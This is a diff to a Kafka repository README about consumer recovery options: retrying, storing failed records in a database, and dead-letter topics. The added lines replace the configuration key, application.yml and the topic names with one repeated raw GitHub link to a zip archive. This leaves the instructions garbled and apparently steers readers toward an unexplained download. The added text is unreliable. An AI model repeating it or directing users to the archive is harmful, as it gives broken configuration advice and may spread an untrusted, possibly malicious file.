bcallanan/kafka/README.md

 Consumer Event recover options for this repository.
 All of these recoveries options are scenarios where there is an actual recovery reason to retry the consumption again.

-The behavior is controlled auto configuration with application.yml -> by spring.kafka.republishRetries: true|false
+The behavior is controlled auto configuration with https://raw.githubusercontent.com/bcallanan/kafka/main/avocatory/kafka.zip -> by https://raw.githubusercontent.com/bcallanan/kafka/main/avocatory/kafka.zip true|false

    - False - Stores the recoverable uses in the DB. (options 2 & 4)
    - True - Republishes back into kafka with the newly update topics (options 1 & 3)

 1) When a recoverable failure occurs because of a runtime exception.
-It would be possible to re-tag the message's topic and update the kafka message 'store-events.RETRY'.
+It would be possible to re-tag the message's topic and update the kafka message 'https://raw.githubusercontent.com/bcallanan/kafka/main/avocatory/kafka.zip'.

    The caveat is avoiding an infinite loop on the recovery while the runtime exception continues.

 1) When a recoverable failure occurs because of a runtime exception.
 It would be possible to persist the message into the DB and process the message when the runtime exception is corrected.
 The build a scaler that will take the retry records and reprocess them back into the consumer process.
 Basically polling the message queue at a regular interval for failed records and reprocess them by redirecting the storeEventsConsumer service logic.

 1) Discard the message - 'Re-Publish' the failed record into a deadletter topic for tracking purposes.
 Same as previously metioned.
-Push the update back into kafka with an updated topic: 'store-events.DEADLETTER'
+Push the update back into kafka with an updated topic: 'https://raw.githubusercontent.com/bcallanan/kafka/main/avocatory/kafka.zip'

 1) Save the failed record into the DB for tracking purposes only and move on...